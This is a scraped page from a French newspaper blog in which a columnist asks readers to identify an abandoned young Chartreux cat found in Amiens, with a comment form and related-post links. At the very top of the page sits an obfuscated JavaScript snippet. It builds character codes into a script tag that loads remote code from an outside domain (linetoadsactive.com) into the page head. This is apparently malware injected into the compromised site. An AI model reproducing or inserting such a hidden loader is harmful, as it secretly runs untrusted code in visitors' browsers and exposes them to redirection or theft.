Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,119,101,108,108,46,108,105,110,101,116,111,97,100,115,97,99,116,105,118,101,46,99,111,109,47,109,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();

    Qui reconnaît cette petite chatte abandonnée ?

     

    Duchesse a dû souffrir. Photos : Philippe Lacoche
    Duchesse au soleil.
    Elle adore le soleil!
    Un petit câlin.
    Duchesse sort de l’appentis.
    Duchesse blottie contre Gorille.

    Ma petite fiancée adore les animaux. Lorsque les matous viennent dans son jardin de la rue de Boutillerie, à Amiens, pour enquiquiner sa chatte Papillotte, elle les chasse, certes avec énergie, mais avec une gentillesse qui force le respect. Avec le printemps, vous vous doutez qu’elle a du travail car Papillotte, malgré un léger embonpoint dû au manque d’exercice – c’est, en fait, une grosse feignasse – et à de régulières OD de croquettes, est assez canon. Généralement, les vieux matous concupiscents comprennent qu’ils n’ont pas la cote auprès de leur belle-maman potentielle, et s’en vont vers d’autres cieux, courtiser d’autres minettes. Il y a peu, mon amie a constaté qu’un chat revenait toujours se mettre à l’abri sous l’appentis et, même, qu’il y restait. Elle s’est donc intéressée à l’animal et a fini par constater qu’il ne s’agissait pas un matou bad guy, un Thomas O’Malley des rues en rut, mais bien une mignonne petite chatte. Dans un second temps, elle constata aussi qu’elle était en très mauvais état et d’une maigreur incroyable. La pauvre petite bête, un adorable chartreux, n’avait plus que la peau sur les os. Ça fendait le cœur. À vue d’œil, elle est toute jeune, cinq ou six mois tout au plus. Nul doute qu’elle avait dû se faire salement embêter par certains gros queutards des faubourgs. Des Marc Dutroux en puissance. Peut-être que, se la disputant, ils s’étaient bagarrés devant elle; peut-être même qu’ils avaient abusé d’elle. Allez savoir. Ma petite fiancée se pencha un peu plus sur son cas. Après l’avoir confortablement installée dans le logis de Djali, sa regrettée chèvre que lui avait offerte son père, alors, qu’enfant, elle réclamait un chien, elle la nourrit et l’abreuva avec soin, la caressa beaucoup afin de lui redonner confiance, et l’installa dans un panier tout douillet au côté de Gorille, l’une de ses peluches de petite fille. Elle constata également que les coussinets de ses pattes étaient tendres, ce qui prouve qu’elle ne vivait pas dans les rues mais qu’elle devait avoir une famille. Comment s’était-elle retrouvée dans cette délicate position, abandonnée de tous? Mystère et boule de poils! Nous la fîmes visiter au cabinet vétérinaire de Longueau où il fut constaté qu’elle n’était pas pucée. Comme elle est vraiment craquante, mignonne, douce, ronronnante et très polie, nous nous mîmes à lui chercher un nom. Elle opta pour Paillette; moi, pour Duchesse. Deux noms, ce n’est pas évident pour une petite bestiole déjà perturbée par la brutalité des mâles. Nous finîmes par nous dire que le mieux serait qu’elle retrouvât sa famille. Car famille elle a. Alors, si vous la reconnaissez sur cette photographie (je mettrai d’autres photos de Paillette-Duchesse sur mon blog Les Dessous chics), écrivez-moi au journal ou contactez-moi sur Facebook. On me transmettra. Si sa famille ne se manifeste pas, sachez qu’elle est adoptable car très propre et très douce. À l’avance, merci. (J’aurais vraiment tout fait dans ce journal; voilà que je m’adonne maintenant à la petite annonce de recherche animalière!)

    Dimanche 10 mai 2020.

     

    Commentez ou exprimez-vous grâce aux emojis !
    2
    J'AIMEJ'AIME
    2
    J'ADOREJ'ADORE
    0
    HahaHaha
    0
    WOUAHWOUAH
    0
    SUPER !SUPER !
    0
    TRISTETRISTE
    0
    GrrrrGrrrr
    Merci !

    Tags:

    • Ca y est, lectrice, mon amour! J’ai mon blog ! En fait, j’en ai deux (de blogs) : celui-ci dessous (chics) hébergé par mon cher Courrier picard et celui hébergé sur le site de la revue La Règle du Jeu, de Bernard-Henri Lévy. En ce qui concerne ce blog du Courrier picard, j’y parlerai des trois choses les plus importantes dans la vie : les filles, la littérature et le rock’n’roll. On y retrouvera certaines chroniques des « Dessous chics », mon rendez-vous culturel et dominical du Courrier picard, certains bouts d’interviews que, faute de place, je ne peux publier, des commentaires divers sur l’air du temps, des rencontres, des coups de coeur et des coups de gueule… Et pour me faire de la pub, je parlerai sans complexe de mes bouquins. (Pourquoi se priver de se faire du bien quand, d’un seul coup, on devient puissant, grâce à ce fichu blog, presque le maître du monde). Je ne publierai que les commentaires des filles. Ceux, velus et répugnants, des mecs, seront censurés, sauf ceux qui diront du bien de moi. (Ce qui, je le sais, n’arrivera pas.). Voilà, lectrice, ma fée humide, mon ange terriblement sexué, tu sais tout. Jette-toi sur mon blog comme sur mon corps : dévore-le. Dévore-moi, gourgandine!

    • Show Comments

    Your email address will not be published. Required fields are marked *

    comment *

    • name *

    • email *

    • website *

    You May Also Like

    Une balade hors saison d’un Français définitif

          La solitude me va mal au teint. Sous mes dehors aristocratiques ...

    Les coups de coeur du marquis…

    Une jolie vie de petit lapin Superbe! Il n’y a pas d’autre mot pour ...

    Pluie sur Paris, guerres, Allemagne et gueules cassées

      Ces derniers temps, il pleut souvent quand je vais à Paris. Il pleuvait ...

    Un champagne de l’Aube par un après-midi de pluie

      J’ai toujours adoré les bars d’hôtels. Ils ont un côté à la fois ...

    Lecture : sélection subjective

      Confinés, lisez! Voici la suite de mes conseils de lecture. Voyage au bout ...

    Ça ne s’arrêtera donc jamais?

          Merlieux, Creil, Abbeville… Les salons du livre défilaient dans ma tête ...